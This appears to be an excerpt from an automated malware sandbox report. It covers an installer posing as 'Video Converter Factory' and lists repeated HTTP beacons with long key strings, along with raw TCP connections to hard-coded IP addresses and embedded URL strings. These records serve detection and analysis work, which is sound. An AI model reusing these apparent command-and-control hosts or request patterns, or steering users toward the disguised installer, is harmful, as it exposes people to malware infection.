                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D22B95 WSASetLastError,WSARecv,WSASetLastError,select,3_2_02D22B95
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328b HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /rand HTTP/1.1Host: 31.214.157.226Accept: */*
                  Source: global trafficHTTP traffic detected: GET /rand HTTP/1.1Host: 31.214.157.226Accept: */*
                  Source: videoconverterfactory.exe, 00000003.00000000.1372571688.00000000004D5000.00000002.00000001.01000000.00000009.sdmp, VideoConverterFactory.exe.3.dr, is-LETAI.tmp.2.dr, videoconverterfactory.exe.2.drString found in binary or memory: http://wonderwork.ucoz.com/
                  Source: Oz2UhFBTHy.tmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.drString found in binary or memory: http://www.innosetup.com/
                  Source: Oz2UhFBTHy.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                  Source: Oz2UhFBTHy.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                  Source: Oz2UhFBTHy.exe, 00000000.00000003.1358253344.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1358092526.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.drString found in binary or memory: http://www.remobjects.com/ps
                  Source: Oz2UhFBTHy.exe, 00000000.00000003.1358253344.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1358092526.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.drString found in binary or memory: http://www.remobjects.com/psU
                  Source: videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/-X
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/0
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/?X
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/CX
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/T
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/UX
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/a
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a52
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab710463926
                  Source: videoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/en-GB
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/gX
                  Source: videoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/mH
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ography
                  Source: videoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/priseCertificates
